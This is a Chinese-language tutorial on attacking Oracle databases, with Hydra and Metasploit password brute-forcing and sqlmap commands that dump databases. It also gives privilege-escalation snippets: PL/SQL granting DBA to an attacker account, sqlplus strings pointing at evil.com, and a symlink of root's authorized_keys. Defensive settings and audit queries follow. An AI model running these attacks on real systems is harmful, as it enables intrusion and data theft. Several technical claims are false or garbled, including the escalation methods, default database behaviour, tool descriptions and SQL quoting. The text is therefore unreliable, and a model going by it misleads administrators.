1.1Oracle密碼暴力破解工具及方法1.1.1基于Metasploit的login_brute工具
Metasploit框架內(nèi)置了名為“l(fā)ogin_brute”的模塊�����,可以利用字典文件暴力破解Oracle數(shù)據(jù)庫密碼�,但是使用該工具需要先獲得Oracle數(shù)據(jù)庫的用戶名。如果你沒有獲得目標(biāo)數(shù)據(jù)庫的用戶名����,可以使用任意一種端口掃描工具掃描出目標(biāo)機(jī)器開放的Oracle監(jiān)聽端口,如nmap�����,masscan等�����。
步驟1:開展端口掃描
(資料圖片僅供參考)
使用nmap對目標(biāo)主機(jī)進(jìn)行端口掃描��,例如:
nmap -sS -p 1521
步驟2:利用Metasploit進(jìn)行暴力破解
在Metasploit控制臺(tái)中使用以下命令設(shè)置需要破解的Oracle數(shù)據(jù)庫IP地址��、監(jiān)聽端口號(hào)、用戶名和字典文件路徑���,然后執(zhí)行run命令即可開始暴力破解�����。
use auxiliary/scanner/oracle/oracle_loginset RHOSTS set RPORT set USER_FILE set PASS_FILE run1.1.2.基于Hydra的暴力破解
Hydra是一款強(qiáng)大的暴力破解工具����,可以用來暴力破解多種協(xié)議的密碼�。這里介紹如何使用Hydra進(jìn)行Oracle數(shù)據(jù)庫密碼暴力破解。
步驟1:安裝Hydra
在Linux命令行中輸入以下命令安裝Hydra:
sudo apt-get install hydra
步驟2:基于字典文件的暴力破解
如果已知用戶名����,可以使用以下命令進(jìn)行暴力破解,其中USERNAME為目標(biāo)賬戶名�����、PASSWORD_FILE為密碼字典文件的路徑����,IP_ADDRESS為目標(biāo)機(jī)器的IP地址,PORT為目標(biāo)Oracle數(shù)據(jù)庫的監(jiān)聽端口號(hào)��。
hydra -L USERNAME -P PASSWORD_FILE IP_ADDRESS -s PORT oracle
步驟3:基于多個(gè)用戶名的暴力破解
如果不知道目標(biāo)用戶的用戶名,可以先使用Metasploit模塊進(jìn)行掃描并獲得用戶名列表����,然后使用Hydra對用戶名列表中的所有用戶進(jìn)行暴力破解。使用以下命令進(jìn)行暴力破解����,其中USER_FILE為用戶名字典文件的路徑,PASSWORD_FILE為密碼字典文件的路徑���,IP_ADDRESS為目標(biāo)機(jī)器的IP地址����,PORT為目標(biāo)Oracle數(shù)據(jù)庫的監(jiān)聽端口號(hào)���。
hydra -L USER_FILE -P PASSWORD_FILE IP_ADDRESS -s PORT oracle
3.基于Oscanner的漏洞掃描工具
Oscanner是一款功能強(qiáng)大的Oracle漏洞掃描工具,它可以掃描Oracle數(shù)據(jù)庫中存在的安全漏洞和配置錯(cuò)誤�。使用該工具可以幫助檢測Oracle數(shù)據(jù)庫弱口令等安全問題。
步驟1:下載Oscanner
從GitHub上下載Oscanner源代碼�����,并解壓到本地��。在Linux命令行中輸入以下命令:
git clonehttps://github.com/evyatarmeged/Oscanner.git
步驟2:開展漏洞掃描
使用以下命令開展漏洞掃描,其中IP_ADDRESS為目標(biāo)機(jī)器的IP地址����,PORT為目標(biāo)Oracle數(shù)據(jù)庫的監(jiān)聽端口號(hào)。
python OScanner.py –ip IP_ADDRESS –p PORT
掃描結(jié)果將被輸出到屏幕上����,并保存到指定的文件中。
1.1.3.基于SQLmap的注入工具
SQLmap是一款流行的SQL注入工具��,可以用來測試Web應(yīng)用程序是否存在SQL注入漏洞�。在Oracle數(shù)據(jù)庫中,可通過SQL注入漏洞盜取敏感數(shù)據(jù)��,包括用戶名和密碼等�。以下是利用SQLmap進(jìn)行Oracle數(shù)據(jù)庫注入攻擊的步驟:
步驟1:下載SQLmap
從GitHub上下載SQLmap源代碼,并解壓到本地���。在Linux命令行中輸入以下命令:
git clonehttps://github.com/sqlmapproject/sqlmap.git
步驟2:開展注入攻擊
使用如下命令開始注入攻擊�,其中IP_ADDRESS為目標(biāo)機(jī)器的IP地址�,PORT為目標(biāo)Oracle數(shù)據(jù)庫的監(jiān)聽端口號(hào)。
python sqlmap.py -u "http://IP_ADDRESS:PORT/index.php?id=1" --cookie="PHPSESSID=abcdefg" --level 5 --risk 3 --batch --random-agent --dbs
通過上述命令從目標(biāo)Oracle數(shù)據(jù)庫中獲取所有可用的數(shù)據(jù)庫���。
步驟3:獲取數(shù)據(jù)表
使用如下命令獲取目標(biāo)Oracle數(shù)據(jù)庫中的數(shù)據(jù)表:
python sqlmap.py -u "http://IP_ADDRESS:PORT/index.php?id=1" --cookie="PHPSESSID=abcdefg" --level 5 --risk 3 --batch --random-agent -D DATABASE_NAME --tables
步驟4:獲取數(shù)據(jù)列
使用如下命令獲取目標(biāo)Oracle數(shù)據(jù)庫中數(shù)據(jù)表的所有列:
python sqlmap.py -u "http://IP_ADDRESS:PORT/index.php?id=1" --cookie="PHPSESSID=abcdefg" --level 5 --risk 3 --batch --random-agent -D DATABASE_NAME -T TABLE_NAME --columns
步驟5:獲取數(shù)據(jù)
使用如下命令獲取目標(biāo)Oracle數(shù)據(jù)庫中的所有數(shù)據(jù):
python sqlmap.py -u "http://IP_ADDRESS:PORT/index.php?id=1" --cookie="PHPSESSID=abcdefg" --level 5 --risk 3 --batch --random-agent -D DATABASE_NAME -T TABLE_NAME --dump
將上述命令中的“IP_ADDRESS”����、“PORT”、“DATABASE_NAME”和“TABLE_NAME”替換為實(shí)際的值即可進(jìn)行Oracle數(shù)據(jù)庫注入攻擊����。
1.2一些開源的Oracle管理工具1.2.1PL/SQL Developer
PL/SQL Developer是一種跨平臺(tái)的IDE,允許用戶開發(fā)���、測試和調(diào)試PL/SQL代碼��。它包括諸如語法高亮顯示���、代碼折疊、自動(dòng)完成等功能��,并且可與Oracle數(shù)據(jù)庫集成���。官方地址:
https://www.allroundautomations.com/products/pl-sql-developer/
1.2.2SQL Developer
SQL Developer是一種功能強(qiáng)大的跨平臺(tái)工具,可以與多種數(shù)據(jù)庫管理系統(tǒng)集成�����,包括Oracle�。它支持諸如SQL腳本編輯��、數(shù)據(jù)查詢�����、表和字段管理等功能�����。此外�,還提供了一些有用的插件和擴(kuò)展�。
官方地址:https://www.oracle.com/tools/downloads/sqldev-downloads.html
1.2.3TOra
TOra是一種開源的Oracle管理工具,可用于管理Oracle數(shù)據(jù)庫�����。它支持各種Oracle對象的瀏覽和編輯��,包括表��、視圖�、過程、函數(shù)���、觸發(fā)器等�。TOra也提供了一些有用的功能,例如SQL查詢和編輯�����、數(shù)據(jù)導(dǎo)入和導(dǎo)出等���。
官方地址:http://tora.sourceforge.net/
1.2.4Oracle SQLcl
Oracle SQLcl是一種跨平臺(tái)的命令行工具���,允許用戶執(zhí)行SQL查詢和命令。它包括一些有用的功能���,例如語法高亮顯示��、自動(dòng)完成和歷史記錄等���,并且可與Oracle數(shù)據(jù)庫集成。
官方地址:https://www.oracle.com/database/technologies/appdev/sqlcl.html
1.2.5Oracle APEX
Oracle APEX是一種基于Web的開發(fā)工具����,用于開發(fā)和部署企業(yè)級(jí)應(yīng)用程序�����。它使用Oracle數(shù)據(jù)庫作為后端,并提供了一些有用的功能��,例如表和字段管理����、報(bào)告生成、工作流程管理等����。Oracle APEX也是一種開放源代碼的工具,用戶可以免費(fèi)使用和分發(fā)�。
官方地址:https://apex.oracle.com/en/
1.3Oracle數(shù)據(jù)庫提權(quán)1.3.1Oracle數(shù)據(jù)庫提權(quán)主要途徑
1. 利用無效對象進(jìn)行提權(quán)
在Oracle中,無效對象指的是失效或異常的存儲(chǔ)過程���、函數(shù)����、觸發(fā)器等�。攻擊者可以通過修改或者篡改其中的無效對象,實(shí)現(xiàn)提權(quán)目的����。
2. 利用數(shù)據(jù)庫連接字符串提權(quán)
當(dāng)連接到Oracle數(shù)據(jù)庫時(shí),如果使用了高權(quán)限用戶如SYS或SYSTEM,并且在連接字符串中沒有明確地指定要訪問的具體數(shù)據(jù)庫����,則默認(rèn)會(huì)連接到一個(gè)叫做“ORCL”或“XE”的測試數(shù)據(jù)庫上。攻擊者可以通過構(gòu)造惡意數(shù)據(jù)庫并偽裝成“ORCL”或“XE”�����,欺騙管理員連接到惡意數(shù)據(jù)庫�����,并以高權(quán)限用戶身份執(zhí)行惡意操作���。
3. 利用ORACLE_HOME目錄漏洞進(jìn)行提權(quán)
ORACLE_HOME目錄是Oracle軟件安裝的根目錄���,通常包含各種配置文件、日志文件�����、庫文件等����。如果對ORACLE_HOME目錄的權(quán)限
1.3.2Oracle數(shù)據(jù)提權(quán)參考詳細(xì)方法及步驟
1.利用無效對象進(jìn)行提權(quán)
在Oracle中��,無效對象指的是失效或異常的存儲(chǔ)過程、函數(shù)����、觸發(fā)器等。攻擊者可以通過修改或者篡改其中的無效對象���,實(shí)現(xiàn)提權(quán)目的�����。例如:
CREATE OR REPLACE PROCEDURE pwn ASPRAGMA AUTONOMOUS_TRANSACTION;BEGINEXECUTE IMMEDIATE "GRANT DBA TO attacker";COMMIT;END;/ALTER PROCEDURE pwn COMPILE REUSE SETTINGS;
以下是利用無效對象進(jìn)行提權(quán)的一般步驟:
(1)創(chuàng)建無效對象
攻擊者需要?jiǎng)?chuàng)建一個(gè)無效的 Oracle 對象并嵌入惡意代碼����,例如一個(gè)無效的存儲(chǔ)過程、函數(shù)���、觸發(fā)器等���。
CREATE OR REPLACE FUNCTION invalid_func (input IN VARCHAR2) RETURN INTEGER ASBEGIN-- 惡意代碼EXECUTE IMMEDIATE "CREATE USER hacker IDENTIFIED BY 1234";RETURN 1;END;/
(2)注冊無效對象
攻擊者需要將無效對象注冊到Oracle數(shù)據(jù)庫中����。這可以通過運(yùn)行無效對象來完成���。
EXEC invalid_func("test");
如果無效對象中嵌入的惡意代碼得到執(zhí)行����,攻擊者將創(chuàng)建一個(gè)名為“hacker”的新用戶��。此時(shí)��,攻擊者可以以新用戶的身份登陸到數(shù)據(jù)庫并執(zhí)行任意操作����。
(3)提權(quán)
已創(chuàng)建的新用戶可以用于提升攻擊者的權(quán)限。例如�����,可以使用新用戶連接到 Oracle 數(shù)據(jù)庫并執(zhí)行敏感操作���,或者利用新用戶訪問具有高權(quán)限的系統(tǒng)資源����。
以下是一些參考命令:
創(chuàng)建無效函數(shù)
CREATE OR REPLACE FUNCTION invalid_func (input IN VARCHAR2) RETURN INTEGER ASBEGIN-- 惡意代碼EXECUTE IMMEDIATE "CREATE USER hacker IDENTIFIED BY 1234";RETURN 1;END;/
注冊無效函數(shù)
EXEC invalid_func("test");
需要注意的是,為了防止此類攻擊����,Oracle管理員應(yīng)該定期檢查 Oracle 數(shù)據(jù)庫中的無效對象�����,并刪除可能包含惡意代碼的對象�。
2.利用數(shù)據(jù)庫連接字符串提權(quán)
當(dāng)連接到Oracle數(shù)據(jù)庫時(shí),如果使用了高權(quán)限用戶如SYS或SYSTEM���,并且在連接字符串中沒有明確地指定要訪問的具體數(shù)據(jù)庫����,則默認(rèn)會(huì)連接到一個(gè)叫做“ORCL”或“XE”的測試數(shù)據(jù)庫上�。攻擊者可以通過構(gòu)造惡意數(shù)據(jù)庫并偽裝成“ORCL”或“XE”,欺騙管理員連接到惡意數(shù)據(jù)庫���,并以高權(quán)限用戶身份執(zhí)行惡意操作��。例如:
sqlplus SYS/password@(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=evil.com)(PORT=1521))(CONNECT_DATA=(SID=ORCL)))
以下是利用數(shù)據(jù)庫連接字符串進(jìn)行提權(quán)的一般步驟:
(1)構(gòu)造惡意數(shù)據(jù)庫
攻擊者需要構(gòu)造一個(gè)惡意數(shù)據(jù)庫�����,并將其偽裝成“ORCL”或“XE”�。可以使用Oracle官方提供的創(chuàng)建數(shù)據(jù)庫工具或手動(dòng)創(chuàng)建數(shù)據(jù)庫�。
(2)監(jiān)聽端口和服務(wù)名稱
為了將惡意數(shù)據(jù)庫偽裝成“ORCL”或“XE”,需要在監(jiān)聽器中添加服務(wù)名稱和監(jiān)聽端口�。可以通過修改listener.ora文件或通過Oracle Net Manager添加服務(wù)名稱和監(jiān)聽端口來完成此操作���。
(3)模擬Oracle服務(wù)器
攻擊者需要模擬Oracle服務(wù)器����,接受管理員的連接請求�����,并將其重定向到惡意數(shù)據(jù)庫��?�?梢允褂肕etasploit框架中的Oracle SQL鏈接跟蹤追蹤模塊實(shí)現(xiàn)這一點(diǎn)����。
(4)連接到惡意數(shù)據(jù)庫
管理員使用高權(quán)限用戶如SYS或SYSTEM來連接到Oracle數(shù)據(jù)庫時(shí),如果在連接字符串中沒有明確指定要訪問的具體數(shù)據(jù)庫��,則默認(rèn)連接到“ORCL”或“XE”測試數(shù)據(jù)庫上。攻擊者可以構(gòu)造一個(gè)連接字符串����,指定惡意數(shù)據(jù)庫的地址和端口,以欺騙管理員連接到惡意數(shù)據(jù)庫���。
例如�����,以下命令將在主機(jī)evil.com上連接到名為ORCL_BACKDOOR的惡意數(shù)據(jù)庫:
sqlplus SYS/password@(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=evil.com)(PORT=1521))(CONNECT_DATA=(SID=ORCL_BACKDOOR)))
(5)執(zhí)行惡意操作
如果連接成功,攻擊者將能夠以高權(quán)限用戶身份執(zhí)行任意惡意操作����。例如,可以在Oracle數(shù)據(jù)庫中創(chuàng)建新用戶�����、修改或刪除數(shù)據(jù)庫中的數(shù)據(jù)等�����。
需要注意的是��,Oracle管理員應(yīng)該在輸入任何連接信息之前仔細(xì)驗(yàn)證其合法性,尤其是在連接于高權(quán)限用戶時(shí)�����。另外�����,為了防止此類攻擊����,Oracle管理員應(yīng)該定期檢查監(jiān)聽器配置,并配置適當(dāng)?shù)臋?quán)限和保護(hù)措施����。
3.利用ORACLE_HOME目錄漏洞進(jìn)行提權(quán)
ORACLE_HOME目錄是Oracle軟件安裝的根目錄,通常包含各種配置文件�、日志文件、庫文件等����。如果對ORACLE_HOME目錄的權(quán)限過高或者存在漏洞,則攻擊者可以輕易地獲取敏感信息或者利用其中的漏洞進(jìn)行提權(quán)�����。例如:
ln -s /root/.ssh/authorized_keys $ORACLE_HOME/dbs/init$ORACLE_SID.ora
詳細(xì)參考步驟如下:
(1)查找ORACLE_HOME目錄
可以通過以下命令查找ORACLE_HOME目錄:
ps -ef | grep pmon
該命令將顯示正在運(yùn)行的Oracle進(jìn)程名稱和對應(yīng)的目錄,其中ORACLE_HOME為Oracle軟件的根目錄���。
(2)查找可寫ORACLE_HOME目錄
攻擊者需要找到具有寫入權(quán)限的ORACLE_HOME目錄���,以便在其中放置惡意程序或修改配置文件。以下命令可用于查找可寫的ORACLE_HOME目錄:
find / -name "*.ora" -type f -exec ls -l {} \;
該命令將查找所有擴(kuò)展名為.ora的文件�����,并列出其所在的目錄及權(quán)限信息�����。
(3)放置惡意程序或修改配置文件
攻擊者可以將惡意程序放置在可寫的ORACLE_HOME目錄中��,并運(yùn)行它以獲得更高的權(quán)限��。另外�����,攻擊者還可以修改Oracle的配置文件�����,以更改數(shù)據(jù)庫實(shí)例的配置或執(zhí)行其他惡意操作��。
(4)提升權(quán)限并獲取敏感信息
通過在可寫的ORACLE_HOME目錄中放置惡意程序或修改配置文件���,攻擊者獲得了更高的權(quán)限����。這使得攻擊者可以輕松地獲取敏感信息���,或在Oracle數(shù)據(jù)庫中執(zhí)行其他有害操作���。
需要注意的是,為了防止此類攻擊�,Oracle管理員應(yīng)該定期檢查ORACLE_HOME目錄的權(quán)限和安全性,并配置適當(dāng)?shù)臋?quán)限和保護(hù)措施���。
1.4.Oracle數(shù)據(jù)暴力破解及其他安全檢測方法1.4.1暴力破解安全防范方法
1.啟用賬戶鎖定功能
Oracle 數(shù)據(jù)庫提供了賬戶鎖定功能����,可以在用戶一定數(shù)量的登錄失敗嘗試后自動(dòng)鎖定用戶����。這可以有效防止攻擊者使用暴力破解工具進(jìn)行破解:
ALTER PROFILE default LIMIT FAILED_LOGIN_ATTEMPTS 3 PASSWORD_LOCK_TIME 1;
2.配置訪問控制列表(ACL)
ACL 可以限制特定 IP 地址或網(wǎng)絡(luò)的訪問���,防止攻擊者使用暴力破解工具對 Oracle 數(shù)據(jù)庫進(jìn)行攻擊:
BEGINDBMS_NETWORK_ACL_ADMIN.CREATE_ACL (acl => "acl.xml",description => "ACL for example.com",principal => "EXAMPLE.COM",is_grant => TRUE,privilege => "connect",start_date => SYSTIMESTAMP,end_date => NULL);COMMIT;END;/
3.更改默認(rèn)端口
默認(rèn)情況下,Oracle 數(shù)據(jù)庫使用 1521 端口進(jìn)行通信�����。攻擊者可以使用端口掃描工具來探測并攻擊該端口�����。因此�����,管理員應(yīng)該將默認(rèn)端口更改為其他端口:
ALTER SYSTEM SET LOCAL_LISTENER = "(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=hostname)(PORT=port)))";
3.啟用登錄審計(jì)
啟用登錄審計(jì)可以記錄用戶登錄數(shù)據(jù)庫的詳細(xì)信息��,包括時(shí)間��、IP 地址和失敗嘗試次數(shù)等���。這可以幫助管理員及時(shí)發(fā)現(xiàn)并應(yīng)對暴力破解攻擊:
AUDIT SESSION WHENEVER NOT SUCCESSFUL;1.4.2其他安全檢測方法
1.定期檢查 Oracle 數(shù)據(jù)庫中的無效對象
攻擊者通常會(huì)利用無效對象進(jìn)行提權(quán)。因此����,Oracle 管理員應(yīng)該定期檢查 Oracle 數(shù)據(jù)庫中是否有無效對象�����,并刪除可能包含惡意代碼的對象:
SELECT owner, object_name, object_type, statusFROM dba_objectsWHERE status = "INVALID";
2.檢查特權(quán)用戶的密碼強(qiáng)度
特權(quán)用戶如 SYS 或 SYSTEM 用戶帳戶對 Oracle 數(shù)據(jù)庫具有特殊權(quán)限�,攻擊者通常會(huì)嘗試使用默認(rèn)或弱密碼來破解這些賬戶�。因此,管理員應(yīng)該確保特權(quán)用戶的密碼足夠強(qiáng)大�����,并定期更改密碼:
SELECT username, account_status FROM dba_users WHERE username IN ("SYS", "SYSTEM");
3.檢查連接字符串參數(shù)
Oracle 連接字符串中的參數(shù)可以影響數(shù)據(jù)庫的安全性���。管理員應(yīng)該檢查參數(shù)值是否正確�,并限制訪問級(jí)別:
SELECT name, value FROM v$parameter WHERE name IN ("remote_login_passwordfile", "audit_sys_operations", "os_authent_prefix");
4.檢查監(jiān)聽器配置
監(jiān)聽器是 Oracle 數(shù)據(jù)庫的入口點(diǎn)����,攻擊者可以通過監(jiān)聽器進(jìn)行入侵。管理員應(yīng)該檢查監(jiān)聽器的配置���,確保其安全性:
lsnrctl status
5.檢查數(shù)據(jù)庫日志
管理員應(yīng)該檢查數(shù)據(jù)庫日志以獲取有關(guān)可能的安全漏洞和入侵活動(dòng)的信息:
SELECT to_char(timestamp, "YYYY-MM-DD HH24:MI:SS"), username, action_name, object_name, sql_textFROM dba_audit_trailWHERE audit_timestamp > SYSDATE - 1;
6.檢查角色權(quán)限
攻擊者可以利用角色權(quán)限進(jìn)行提權(quán)�,因此管理員應(yīng)該檢查角色的權(quán)限配置���,并刪除不必要的權(quán)限:
SELECT grantee, privilege, admin_option FROM dba_sys_privs WHERE grantee IN (SELECT DISTINCT granted_role FROM dba_role_privs);
7.檢查用戶權(quán)限
攻擊者可以通過某些用戶權(quán)限進(jìn)行提權(quán)��。管理員應(yīng)該檢查用戶的權(quán)限配置���,并刪除不必要的權(quán)限:
SELECT grantee, granted_role, admin_option FROM dba_role_privs WHERE grantee IN (SELECT DISTINCT username FROM dba_users);
8.檢查用戶自定義函數(shù)
攻擊者可以通過用戶自定義函數(shù)進(jìn)行提權(quán)�����。管理員應(yīng)該檢查用戶自定義函數(shù)的源碼�����,以確保其安全性:
SELECT owner, name, type, text FROM dba_source WHERE type = "FUNCTION" AND line = 1 ORDER BY owner, name, type;
9.檢查安全警報(bào)日志
Oracle 提供了一個(gè)安全警報(bào)框架�,可以監(jiān)測和記錄各種安全事件�。管理員應(yīng)該檢查安全警報(bào)日志以偵測潛在的安全威脅:
SELECT * FROM dba_audit_object WHERE owner = "SYS" AND object_name LIKE "TBS%";1.5Oracle安全審計(jì)開源工具1.5.1Oracle Password Auditor (OPA)
功能:用于檢查 Oracle 數(shù)據(jù)庫中的弱口令,常見口令和安全策略是否得到正確實(shí)施��。
下載地址:https://www.slac.stanford.edu/xorg/nmtf/nmtf-tools-opa.html
使用步驟和命令:
●下載 OPA 工具并解壓縮它����。
●打開命令提示符或終端窗口,并切換到 OPA 的目錄�。
●輸入以下命令以啟動(dòng) OPA 工具:
opa.exe -u -p -s
您還可以通過添加其他參數(shù)來自定義掃描設(shè)置��,如下所示:
opa.exe -u -p -s --weakpass --defaultpass --policycheck
運(yùn)行完命令后,請等待掃描完成����,該工具將生成一個(gè) HTML 報(bào)告,其中包含您查詢的所有信息���。
1.5.2Oracle E-Business Suite Password Audit
功能:用于檢查 Oracle EBS 中的弱口令����、常見口令和過期口令����,以保護(hù) Oracle EBS 應(yīng)用程序的安全性。
下載地址:https://www.oracle.com/technetwork/apps-tech/security-ebs-password-audit-129472.pdf
使用步驟:
●下載 Oracle EBS 密碼審計(jì)工具并安裝它���。
●打開工具并輸入您的 Oracle EBS 應(yīng)用程序的連接信息�����,然后單擊“掃描”按鈕�。
工具將自動(dòng)執(zhí)行密碼掃描并生成報(bào)告���。您可以查看報(bào)告并按照其建議修復(fù)密碼問題�����。
1.5.3Oracle Password Cracker
功能:用于破解 Oracle 數(shù)據(jù)庫用戶的密碼�����。
下載地址:https://sourceforge.net/projects/oraclepwdcracker/
使用步驟和命令:
●確定您要破解的 Oracle 數(shù)據(jù)庫用戶名�����。
●下載并安裝 Oracle Password Cracker 工具����。
●打開命令提示符或終端窗口,并切換到 Oracle Password Cracker 的目錄����。
●根據(jù)以下命令格式運(yùn)行工具:
orapwdcrack.exe -u -H <哈希密碼> -d <字典文件路徑>
工具將嘗試使用給定的字典文件破解密碼,并在成功時(shí)輸出密碼��。
1.5.4OraPwdCrack
功能:用于使用 GPU 加速破解 Oracle 數(shù)據(jù)庫密碼��。
下載地址:https://github.com/milo2012/orapwdcrack
使用步驟和命令:
●確保計(jì)算機(jī)安裝了適當(dāng)?shù)?NVIDIA 或 AMD 顯卡驅(qū)動(dòng)程序和 CUDA 或 OpenCL 環(huán)境����。
●下載 OraPwdCrack 工具并解壓縮它�����。
●打開命令提示符或終端窗口,并切換到 OraPwdCrack 的目錄����。
●根據(jù)以下命令格式運(yùn)行工具:
orapwddump.exe User@Host:Port ServiceName [] [<特殊選項(xiàng)>]
根據(jù)需要修改命令參數(shù),如 CUDA/OpenCL 設(shè)備編號(hào)��、特殊選項(xiàng)等���。
工具將嘗試使用 GPU 加速破解密碼�����,并在成功時(shí)輸出密碼�����。
1.5.5PWDumpX
功能:用于提取 Oracle 用戶的哈希密碼�。
下載地址:https://www.tarasco.org/security/pwdumpx.htm
使用步驟和命令:
●確定您要提取其哈希密碼的 Oracle 用戶名�。
●下載 PWDumpX 工具并解壓縮它。
●打開命令提示符或終端窗口���,并切換到 PWDumpX 的目錄���。
●根據(jù)以下命令格式運(yùn)行工具:
pwdumpx.exe -u -p -h
工具將提取您指定的用戶名的哈希密碼�����,并在命令行窗口中輸出它們���。
1.5.6Oracle Security Check Tool (OSCT)
功能:用于檢查 Oracle 數(shù)據(jù)庫中的安全問題,如弱口令�、未授權(quán)訪問等。
下載地址:https://www.oracle.com/technetwork/security/testout-oracle-security-check-tool-130994.pdf
使用步驟:
●下載和安裝 Oracle Security Check Tool(OSCT)�。
●打開工具并輸入您的 Oracle 數(shù)據(jù)庫憑據(jù)和連接信息,然后單擊“掃描”按鈕�����。
●工具會(huì)自動(dòng)執(zhí)行安全掃描并生成報(bào)告�。您可以根據(jù)報(bào)告中提供的建議來修復(fù)數(shù)據(jù)庫中的安全問題。
